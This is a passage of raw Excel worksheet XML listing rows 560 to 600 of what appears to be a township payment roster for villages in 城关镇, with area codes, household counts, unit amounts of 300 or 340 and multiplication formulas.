        <v>1554</v>
      </c>
      <c r="B560" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C560" s="14" t="s">
        <v>507</v>
      </c>
      <c r="D560" s="14" t="s">
        <v>1555</v>
      </c>
      <c r="E560" s="14" t="s">
        <v>306</v>
      </c>
      <c r="F560" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G560" s="14">
        <v>2</v>
      </c>
      <c r="H560" s="14">
        <v>300</v>
      </c>
      <c r="I560" s="14">
        <f>H560*G560</f>
        <v>600</v>
      </c>
      <c r="J560" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K560" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="561" ht="23" customHeight="1" spans="1:11">
      <c r="A561" s="13" t="s">
        <v>1556</v>
      </c>
      <c r="B561" s="14" t="str">
        <f>B560</f>
        <v>城关镇</v>
      </c>
      <c r="C561" s="14" t="str">
        <f>C560</f>
        <v>东北村</v>
      </c>
      <c r="D561" s="13" t="s">
        <v>1557</v>
      </c>
      <c r="E561" s="13" t="s">
        <v>548</v>
      </c>
      <c r="F561" s="14" t="str">
        <f>F560</f>
        <v>4113210103</v>
      </c>
      <c r="G561" s="14"/>
      <c r="H561" s="14"/>
      <c r="I561" s="14"/>
      <c r="J561" s="14"/>
      <c r="K561" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="562" ht="23" customHeight="1" spans="1:11">
      <c r="A562" s="13" t="s">
        <v>1558</v>
      </c>
      <c r="B562" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C562" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D562" s="14" t="s">
        <v>1559</v>
      </c>
      <c r="E562" s="14" t="s">
        <v>484</v>
      </c>
      <c r="F562" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G562" s="14">
        <v>1</v>
      </c>
      <c r="H562" s="14">
        <v>340</v>
      </c>
      <c r="I562" s="14">
        <f>H562*G562</f>
        <v>340</v>
      </c>
      <c r="J562" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K562" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="563" ht="23" customHeight="1" spans="1:11">
      <c r="A563" s="13" t="s">
        <v>1560</v>
      </c>
      <c r="B563" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C563" s="14" t="s">
        <v>1561</v>
      </c>
      <c r="D563" s="14" t="s">
        <v>1562</v>
      </c>
      <c r="E563" s="14" t="s">
        <v>1563</v>
      </c>
      <c r="F563" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G563" s="14">
        <v>1</v>
      </c>
      <c r="H563" s="14">
        <v>340</v>
      </c>
      <c r="I563" s="14">
        <f>H563*G563</f>
        <v>340</v>
      </c>
      <c r="J563" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K563" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="564" ht="23" customHeight="1" spans="1:11">
      <c r="A564" s="13" t="s">
        <v>1564</v>
      </c>
      <c r="B564" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C564" s="14" t="s">
        <v>1565</v>
      </c>
      <c r="D564" s="14" t="s">
        <v>1566</v>
      </c>
      <c r="E564" s="14" t="s">
        <v>880</v>
      </c>
      <c r="F564" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G564" s="14">
        <v>2</v>
      </c>
      <c r="H564" s="14">
        <v>300</v>
      </c>
      <c r="I564" s="14">
        <f>H564*G564</f>
        <v>600</v>
      </c>
      <c r="J564" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K564" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="565" ht="23" customHeight="1" spans="1:11">
      <c r="A565" s="13" t="s">
        <v>1567</v>
      </c>
      <c r="B565" s="14" t="str">
        <f>B564</f>
        <v>城关镇</v>
      </c>
      <c r="C565" s="14" t="str">
        <f>C564</f>
        <v>城关镇中华</v>
      </c>
      <c r="D565" s="13" t="s">
        <v>1568</v>
      </c>
      <c r="E565" s="13" t="s">
        <v>779</v>
      </c>
      <c r="F565" s="14" t="str">
        <f>F564</f>
        <v>4113210108</v>
      </c>
      <c r="G565" s="14"/>
      <c r="H565" s="14"/>
      <c r="I565" s="14"/>
      <c r="J565" s="14"/>
      <c r="K565" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="566" ht="23" customHeight="1" spans="1:11">
      <c r="A566" s="13" t="s">
        <v>1569</v>
      </c>
      <c r="B566" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C566" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D566" s="14" t="s">
        <v>1570</v>
      </c>
      <c r="E566" s="14" t="s">
        <v>1571</v>
      </c>
      <c r="F566" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G566" s="14">
        <v>1</v>
      </c>
      <c r="H566" s="14">
        <v>340</v>
      </c>
      <c r="I566" s="14">
        <f>H566*G566</f>
        <v>340</v>
      </c>
      <c r="J566" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K566" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="567" ht="23" customHeight="1" spans="1:11">
      <c r="A567" s="13" t="s">
        <v>1572</v>
      </c>
      <c r="B567" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C567" s="14" t="s">
        <v>507</v>
      </c>
      <c r="D567" s="14" t="s">
        <v>1573</v>
      </c>
      <c r="E567" s="14" t="s">
        <v>1574</v>
      </c>
      <c r="F567" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G567" s="14">
        <v>3</v>
      </c>
      <c r="H567" s="14">
        <v>265</v>
      </c>
      <c r="I567" s="14">
        <f>H567*G567</f>
        <v>795</v>
      </c>
      <c r="J567" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K567" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="568" ht="23" customHeight="1" spans="1:11">
      <c r="A568" s="13" t="s">
        <v>1575</v>
      </c>
      <c r="B568" s="14" t="str">
        <f>B567</f>
        <v>城关镇</v>
      </c>
      <c r="C568" s="14" t="str">
        <f>C567</f>
        <v>东北村</v>
      </c>
      <c r="D568" s="18" t="s">
        <v>1576</v>
      </c>
      <c r="E568" s="19" t="s">
        <v>1577</v>
      </c>
      <c r="F568" s="14" t="str">
        <f>F567</f>
        <v>4113210103</v>
      </c>
      <c r="G568" s="14"/>
      <c r="H568" s="14"/>
      <c r="I568" s="14"/>
      <c r="J568" s="14"/>
      <c r="K568" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="569" ht="23" customHeight="1" spans="1:11">
      <c r="A569" s="13" t="s">
        <v>1578</v>
      </c>
      <c r="B569" s="14" t="str">
        <f>B568</f>
        <v>城关镇</v>
      </c>
      <c r="C569" s="14" t="str">
        <f>C568</f>
        <v>东北村</v>
      </c>
      <c r="D569" s="19" t="s">
        <v>1579</v>
      </c>
      <c r="E569" s="19" t="s">
        <v>1580</v>
      </c>
      <c r="F569" s="14" t="str">
        <f>F568</f>
        <v>4113210103</v>
      </c>
      <c r="G569" s="14"/>
      <c r="H569" s="14"/>
      <c r="I569" s="14"/>
      <c r="J569" s="14"/>
      <c r="K569" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="570" ht="23" customHeight="1" spans="1:11">
      <c r="A570" s="13" t="s">
        <v>1581</v>
      </c>
      <c r="B570" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C570" s="14" t="s">
        <v>507</v>
      </c>
      <c r="D570" s="14" t="s">
        <v>1582</v>
      </c>
      <c r="E570" s="14" t="s">
        <v>1583</v>
      </c>
      <c r="F570" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G570" s="14">
        <v>1</v>
      </c>
      <c r="H570" s="14">
        <v>340</v>
      </c>
      <c r="I570" s="14">
        <f>H570*G570</f>
        <v>340</v>
      </c>
      <c r="J570" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K570" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="571" ht="23" customHeight="1" spans="1:11">
      <c r="A571" s="13" t="s">
        <v>1584</v>
      </c>
      <c r="B571" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C571" s="14" t="s">
        <v>507</v>
      </c>
      <c r="D571" s="14" t="s">
        <v>1585</v>
      </c>
      <c r="E571" s="14" t="s">
        <v>679</v>
      </c>
      <c r="F571" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G571" s="14">
        <v>2</v>
      </c>
      <c r="H571" s="14">
        <v>300</v>
      </c>
      <c r="I571" s="14">
        <f>H571*G571</f>
        <v>600</v>
      </c>
      <c r="J571" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K571" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="572" ht="23" customHeight="1" spans="1:11">
      <c r="A572" s="13" t="s">
        <v>1586</v>
      </c>
      <c r="B572" s="14" t="str">
        <f>B571</f>
        <v>城关镇</v>
      </c>
      <c r="C572" s="14" t="str">
        <f>C571</f>
        <v>东北村</v>
      </c>
      <c r="D572" s="18" t="s">
        <v>1587</v>
      </c>
      <c r="E572" s="19" t="s">
        <v>288</v>
      </c>
      <c r="F572" s="14" t="str">
        <f>F571</f>
        <v>4113210103</v>
      </c>
      <c r="G572" s="14"/>
      <c r="H572" s="14"/>
      <c r="I572" s="14"/>
      <c r="J572" s="14"/>
      <c r="K572" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="573" ht="23" customHeight="1" spans="1:11">
      <c r="A573" s="13" t="s">
        <v>1588</v>
      </c>
      <c r="B573" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C573" s="14" t="s">
        <v>1369</v>
      </c>
      <c r="D573" s="14" t="s">
        <v>1589</v>
      </c>
      <c r="E573" s="14" t="s">
        <v>309</v>
      </c>
      <c r="F573" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G573" s="14">
        <v>2</v>
      </c>
      <c r="H573" s="14">
        <v>300</v>
      </c>
      <c r="I573" s="14">
        <f>H573*G573</f>
        <v>600</v>
      </c>
      <c r="J573" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K573" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="574" ht="23" customHeight="1" spans="1:11">
      <c r="A574" s="13" t="s">
        <v>1590</v>
      </c>
      <c r="B574" s="14" t="str">
        <f>B573</f>
        <v>城关镇</v>
      </c>
      <c r="C574" s="14" t="str">
        <f>C573</f>
        <v>城关镇北外村</v>
      </c>
      <c r="D574" s="22" t="s">
        <v>1591</v>
      </c>
      <c r="E574" s="22" t="s">
        <v>281</v>
      </c>
      <c r="F574" s="14" t="str">
        <f>F573</f>
        <v>4113210102</v>
      </c>
      <c r="G574" s="14"/>
      <c r="H574" s="14"/>
      <c r="I574" s="14"/>
      <c r="J574" s="14"/>
      <c r="K574" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="575" ht="23" customHeight="1" spans="1:11">
      <c r="A575" s="13" t="s">
        <v>1592</v>
      </c>
      <c r="B575" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C575" s="14" t="s">
        <v>1369</v>
      </c>
      <c r="D575" s="14" t="s">
        <v>1593</v>
      </c>
      <c r="E575" s="14" t="s">
        <v>331</v>
      </c>
      <c r="F575" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G575" s="14">
        <v>1</v>
      </c>
      <c r="H575" s="14">
        <v>340</v>
      </c>
      <c r="I575" s="14">
        <f t="shared" ref="I575:I580" si="23">H575*G575</f>
        <v>340</v>
      </c>
      <c r="J575" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K575" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="576" ht="23" customHeight="1" spans="1:11">
      <c r="A576" s="13" t="s">
        <v>1594</v>
      </c>
      <c r="B576" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C576" s="14" t="s">
        <v>1369</v>
      </c>
      <c r="D576" s="14" t="s">
        <v>1595</v>
      </c>
      <c r="E576" s="14" t="s">
        <v>236</v>
      </c>
      <c r="F576" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G576" s="14">
        <v>1</v>
      </c>
      <c r="H576" s="14">
        <v>340</v>
      </c>
      <c r="I576" s="14">
        <f t="shared" si="23"/>
        <v>340</v>
      </c>
      <c r="J576" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K576" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="577" ht="23" customHeight="1" spans="1:11">
      <c r="A577" s="13" t="s">
        <v>1596</v>
      </c>
      <c r="B577" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C577" s="14" t="s">
        <v>1369</v>
      </c>
      <c r="D577" s="14" t="s">
        <v>1597</v>
      </c>
      <c r="E577" s="14" t="s">
        <v>392</v>
      </c>
      <c r="F577" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G577" s="14">
        <v>1</v>
      </c>
      <c r="H577" s="14">
        <v>340</v>
      </c>
      <c r="I577" s="14">
        <f t="shared" si="23"/>
        <v>340</v>
      </c>
      <c r="J577" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K577" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="578" ht="23" customHeight="1" spans="1:11">
      <c r="A578" s="13" t="s">
        <v>1598</v>
      </c>
      <c r="B578" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C578" s="14" t="s">
        <v>1369</v>
      </c>
      <c r="D578" s="14" t="s">
        <v>1599</v>
      </c>
      <c r="E578" s="14" t="s">
        <v>983</v>
      </c>
      <c r="F578" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G578" s="14">
        <v>1</v>
      </c>
      <c r="H578" s="14">
        <v>340</v>
      </c>
      <c r="I578" s="14">
        <f t="shared" si="23"/>
        <v>340</v>
      </c>
      <c r="J578" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K578" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="579" ht="23" customHeight="1" spans="1:11">
      <c r="A579" s="13" t="s">
        <v>1600</v>
      </c>
      <c r="B579" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C579" s="14" t="s">
        <v>1369</v>
      </c>
      <c r="D579" s="14" t="s">
        <v>1601</v>
      </c>
      <c r="E579" s="14" t="s">
        <v>484</v>
      </c>
      <c r="F579" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G579" s="14">
        <v>1</v>
      </c>
      <c r="H579" s="14">
        <v>340</v>
      </c>
      <c r="I579" s="14">
        <f t="shared" si="23"/>
        <v>340</v>
      </c>
      <c r="J579" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K579" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="580" ht="23" customHeight="1" spans="1:11">
      <c r="A580" s="13" t="s">
        <v>1602</v>
      </c>
      <c r="B580" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C580" s="14" t="s">
        <v>1369</v>
      </c>
      <c r="D580" s="14" t="s">
        <v>1603</v>
      </c>
      <c r="E580" s="14" t="s">
        <v>292</v>
      </c>
      <c r="F580" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G580" s="14">
        <v>2</v>
      </c>
      <c r="H580" s="14">
        <v>300</v>
      </c>
      <c r="I580" s="14">
        <f t="shared" si="23"/>
        <v>600</v>
      </c>
      <c r="J580" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K580" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="581" ht="23" customHeight="1" spans="1:11">
      <c r="A581" s="13" t="s">
        <v>1604</v>
      </c>
      <c r="B581" s="14" t="str">
        <f>B580</f>
        <v>城关镇</v>
      </c>
      <c r="C581" s="14" t="str">
        <f>C580</f>
        <v>城关镇北外村</v>
      </c>
      <c r="D581" s="19" t="s">
        <v>1605</v>
      </c>
      <c r="E581" s="19" t="s">
        <v>616</v>
      </c>
      <c r="F581" s="14" t="str">
        <f>F580</f>
        <v>4113210102</v>
      </c>
      <c r="G581" s="14"/>
      <c r="H581" s="14"/>
      <c r="I581" s="14"/>
      <c r="J581" s="14"/>
      <c r="K581" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="582" ht="23" customHeight="1" spans="1:11">
      <c r="A582" s="13" t="s">
        <v>1606</v>
      </c>
      <c r="B582" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C582" s="14" t="s">
        <v>1369</v>
      </c>
      <c r="D582" s="14" t="s">
        <v>1607</v>
      </c>
      <c r="E582" s="14" t="s">
        <v>288</v>
      </c>
      <c r="F582" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G582" s="14">
        <v>1</v>
      </c>
      <c r="H582" s="14">
        <v>340</v>
      </c>
      <c r="I582" s="14">
        <f t="shared" ref="I582:I591" si="24">H582*G582</f>
        <v>340</v>
      </c>
      <c r="J582" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K582" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="583" ht="23" customHeight="1" spans="1:11">
      <c r="A583" s="13" t="s">
        <v>1608</v>
      </c>
      <c r="B583" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C583" s="14" t="s">
        <v>1369</v>
      </c>
      <c r="D583" s="14" t="s">
        <v>1609</v>
      </c>
      <c r="E583" s="14" t="s">
        <v>1610</v>
      </c>
      <c r="F583" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G583" s="14">
        <v>1</v>
      </c>
      <c r="H583" s="14">
        <v>340</v>
      </c>
      <c r="I583" s="14">
        <f t="shared" si="24"/>
        <v>340</v>
      </c>
      <c r="J583" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K583" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="584" ht="23" customHeight="1" spans="1:11">
      <c r="A584" s="13" t="s">
        <v>1611</v>
      </c>
      <c r="B584" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C584" s="14" t="s">
        <v>1270</v>
      </c>
      <c r="D584" s="14" t="s">
        <v>1612</v>
      </c>
      <c r="E584" s="14" t="s">
        <v>502</v>
      </c>
      <c r="F584" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G584" s="14">
        <v>1</v>
      </c>
      <c r="H584" s="14">
        <v>340</v>
      </c>
      <c r="I584" s="14">
        <f t="shared" si="24"/>
        <v>340</v>
      </c>
      <c r="J584" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K584" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="585" ht="23" customHeight="1" spans="1:11">
      <c r="A585" s="13" t="s">
        <v>1613</v>
      </c>
      <c r="B585" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C585" s="14" t="s">
        <v>1270</v>
      </c>
      <c r="D585" s="14" t="s">
        <v>1614</v>
      </c>
      <c r="E585" s="14" t="s">
        <v>592</v>
      </c>
      <c r="F585" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G585" s="14">
        <v>1</v>
      </c>
      <c r="H585" s="14">
        <v>340</v>
      </c>
      <c r="I585" s="14">
        <f t="shared" si="24"/>
        <v>340</v>
      </c>
      <c r="J585" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K585" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="586" ht="23" customHeight="1" spans="1:11">
      <c r="A586" s="13" t="s">
        <v>1615</v>
      </c>
      <c r="B586" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C586" s="14" t="s">
        <v>1270</v>
      </c>
      <c r="D586" s="14" t="s">
        <v>1616</v>
      </c>
      <c r="E586" s="14" t="s">
        <v>320</v>
      </c>
      <c r="F586" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G586" s="14">
        <v>1</v>
      </c>
      <c r="H586" s="14">
        <v>340</v>
      </c>
      <c r="I586" s="14">
        <f t="shared" si="24"/>
        <v>340</v>
      </c>
      <c r="J586" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K586" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="587" ht="23" customHeight="1" spans="1:11">
      <c r="A587" s="13" t="s">
        <v>1617</v>
      </c>
      <c r="B587" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C587" s="14" t="s">
        <v>1270</v>
      </c>
      <c r="D587" s="14" t="s">
        <v>1618</v>
      </c>
      <c r="E587" s="14" t="s">
        <v>320</v>
      </c>
      <c r="F587" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G587" s="14">
        <v>1</v>
      </c>
      <c r="H587" s="14">
        <v>340</v>
      </c>
      <c r="I587" s="14">
        <f t="shared" si="24"/>
        <v>340</v>
      </c>
      <c r="J587" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K587" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="588" ht="23" customHeight="1" spans="1:11">
      <c r="A588" s="13" t="s">
        <v>1619</v>
      </c>
      <c r="B588" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C588" s="14" t="s">
        <v>1270</v>
      </c>
      <c r="D588" s="14" t="s">
        <v>1620</v>
      </c>
      <c r="E588" s="14" t="s">
        <v>288</v>
      </c>
      <c r="F588" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G588" s="14">
        <v>1</v>
      </c>
      <c r="H588" s="14">
        <v>340</v>
      </c>
      <c r="I588" s="14">
        <f t="shared" si="24"/>
        <v>340</v>
      </c>
      <c r="J588" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K588" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="589" ht="23" customHeight="1" spans="1:11">
      <c r="A589" s="13" t="s">
        <v>1621</v>
      </c>
      <c r="B589" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C589" s="14" t="s">
        <v>1270</v>
      </c>
      <c r="D589" s="14" t="s">
        <v>1622</v>
      </c>
      <c r="E589" s="14" t="s">
        <v>592</v>
      </c>
      <c r="F589" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G589" s="14">
        <v>1</v>
      </c>
      <c r="H589" s="14">
        <v>340</v>
      </c>
      <c r="I589" s="14">
        <f t="shared" si="24"/>
        <v>340</v>
      </c>
      <c r="J589" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K589" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="590" ht="23" customHeight="1" spans="1:11">
      <c r="A590" s="13" t="s">
        <v>1623</v>
      </c>
      <c r="B590" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C590" s="14" t="s">
        <v>1270</v>
      </c>
      <c r="D590" s="14" t="s">
        <v>1624</v>
      </c>
      <c r="E590" s="14" t="s">
        <v>265</v>
      </c>
      <c r="F590" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G590" s="14">
        <v>1</v>
      </c>
      <c r="H590" s="14">
        <v>340</v>
      </c>
      <c r="I590" s="14">
        <f t="shared" si="24"/>
        <v>340</v>
      </c>
      <c r="J590" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K590" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="591" ht="23" customHeight="1" spans="1:11">
      <c r="A591" s="13" t="s">
        <v>1625</v>
      </c>
      <c r="B591" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C591" s="14" t="s">
        <v>1270</v>
      </c>
      <c r="D591" s="14" t="s">
        <v>1626</v>
      </c>
      <c r="E591" s="14" t="s">
        <v>232</v>
      </c>
      <c r="F591" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G591" s="14">
        <v>2</v>
      </c>
      <c r="H591" s="14">
        <v>300</v>
      </c>
      <c r="I591" s="14">
        <f t="shared" si="24"/>
        <v>600</v>
      </c>
      <c r="J591" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K591" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="592" ht="23" customHeight="1" spans="1:11">
      <c r="A592" s="13" t="s">
        <v>1627</v>
      </c>
      <c r="B592" s="14" t="str">
        <f>B591</f>
        <v>城关镇</v>
      </c>
      <c r="C592" s="14" t="str">
        <f>C591</f>
        <v>城关镇东北村</v>
      </c>
      <c r="D592" s="19" t="s">
        <v>1628</v>
      </c>
      <c r="E592" s="19" t="s">
        <v>419</v>
      </c>
      <c r="F592" s="14" t="str">
        <f>F591</f>
        <v>4113210103</v>
      </c>
      <c r="G592" s="14"/>
      <c r="H592" s="14"/>
      <c r="I592" s="14"/>
      <c r="J592" s="14"/>
      <c r="K592" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="593" ht="23" customHeight="1" spans="1:11">
      <c r="A593" s="13" t="s">
        <v>1629</v>
      </c>
      <c r="B593" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C593" s="14" t="s">
        <v>1270</v>
      </c>
      <c r="D593" s="14" t="s">
        <v>1630</v>
      </c>
      <c r="E593" s="14" t="s">
        <v>346</v>
      </c>
      <c r="F593" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G593" s="14">
        <v>2</v>
      </c>
      <c r="H593" s="14">
        <v>300</v>
      </c>
      <c r="I593" s="14">
        <f>H593*G593</f>
        <v>600</v>
      </c>
      <c r="J593" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K593" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="594" ht="23" customHeight="1" spans="1:11">
      <c r="A594" s="13" t="s">
        <v>1631</v>
      </c>
      <c r="B594" s="14" t="str">
        <f>B593</f>
        <v>城关镇</v>
      </c>
      <c r="C594" s="14" t="str">
        <f>C593</f>
        <v>城关镇东北村</v>
      </c>
      <c r="D594" s="19" t="s">
        <v>1632</v>
      </c>
      <c r="E594" s="19" t="s">
        <v>1633</v>
      </c>
      <c r="F594" s="14" t="str">
        <f>F593</f>
        <v>4113210103</v>
      </c>
      <c r="G594" s="14"/>
      <c r="H594" s="14"/>
      <c r="I594" s="14"/>
      <c r="J594" s="14"/>
      <c r="K594" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="595" ht="23" customHeight="1" spans="1:11">
      <c r="A595" s="13" t="s">
        <v>1634</v>
      </c>
      <c r="B595" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C595" s="14" t="s">
        <v>1270</v>
      </c>
      <c r="D595" s="14" t="s">
        <v>1635</v>
      </c>
      <c r="E595" s="14" t="s">
        <v>883</v>
      </c>
      <c r="F595" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G595" s="14">
        <v>2</v>
      </c>
      <c r="H595" s="14">
        <v>300</v>
      </c>
      <c r="I595" s="14">
        <f>H595*G595</f>
        <v>600</v>
      </c>
      <c r="J595" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K595" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="596" ht="23" customHeight="1" spans="1:11">
      <c r="A596" s="13" t="s">
        <v>1636</v>
      </c>
      <c r="B596" s="14" t="str">
        <f>B595</f>
        <v>城关镇</v>
      </c>
      <c r="C596" s="14" t="str">
        <f>C595</f>
        <v>城关镇东北村</v>
      </c>
      <c r="D596" s="19" t="s">
        <v>1637</v>
      </c>
      <c r="E596" s="19" t="s">
        <v>435</v>
      </c>
      <c r="F596" s="14" t="str">
        <f>F595</f>
        <v>4113210103</v>
      </c>
      <c r="G596" s="14"/>
      <c r="H596" s="14"/>
      <c r="I596" s="14"/>
      <c r="J596" s="14"/>
      <c r="K596" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="597" ht="23" customHeight="1" spans="1:11">
      <c r="A597" s="13" t="s">
        <v>1638</v>
      </c>
      <c r="B597" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C597" s="14" t="s">
        <v>1289</v>
      </c>
      <c r="D597" s="14" t="s">
        <v>1639</v>
      </c>
      <c r="E597" s="14" t="s">
        <v>331</v>
      </c>
      <c r="F597" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G597" s="14">
        <v>2</v>
      </c>
      <c r="H597" s="14">
        <v>300</v>
      </c>
      <c r="I597" s="14">
        <f>H597*G597</f>
        <v>600</v>
      </c>
      <c r="J597" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K597" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="598" ht="23" customHeight="1" spans="1:11">
      <c r="A598" s="13" t="s">
        <v>1640</v>
      </c>
      <c r="B598" s="14" t="str">
        <f>B597</f>
        <v>城关镇</v>
      </c>
      <c r="C598" s="14" t="str">
        <f>C597</f>
        <v>城关镇西北村</v>
      </c>
      <c r="D598" s="19" t="s">
        <v>1641</v>
      </c>
      <c r="E598" s="19" t="s">
        <v>1642</v>
      </c>
      <c r="F598" s="14" t="str">
        <f>F597</f>
        <v>4113210106</v>
      </c>
      <c r="G598" s="14"/>
      <c r="H598" s="14"/>
      <c r="I598" s="14"/>
      <c r="J598" s="14"/>
      <c r="K598" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="599" ht="23" customHeight="1" spans="1:11">
      <c r="A599" s="13" t="s">
        <v>1643</v>
      </c>
      <c r="B599" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C599" s="14" t="s">
        <v>1289</v>
      </c>
      <c r="D599" s="14" t="s">
        <v>1644</v>
      </c>
      <c r="E599" s="14" t="s">
        <v>320</v>
      </c>
      <c r="F599" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G599" s="14">
        <v>1</v>
      </c>
      <c r="H599" s="14">
        <v>340</v>
      </c>
      <c r="I599" s="14">
        <f>H599*G599</f>
        <v>340</v>
      </c>
      <c r="J599" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K599" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="600" ht="23" customHeight="1" spans="1:11">
      <c r="A600" s="13" t="s">
        <v>1645</v>
      </c>
      <c r="B600" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C600" s="14" t="s">
        <v>1289</v>
      </c>
      <c r="D600" s="14" t="s">
        <v>1646</v>
      </c>
      <c r="E600" s="14" t="s">
        <v>779</v>
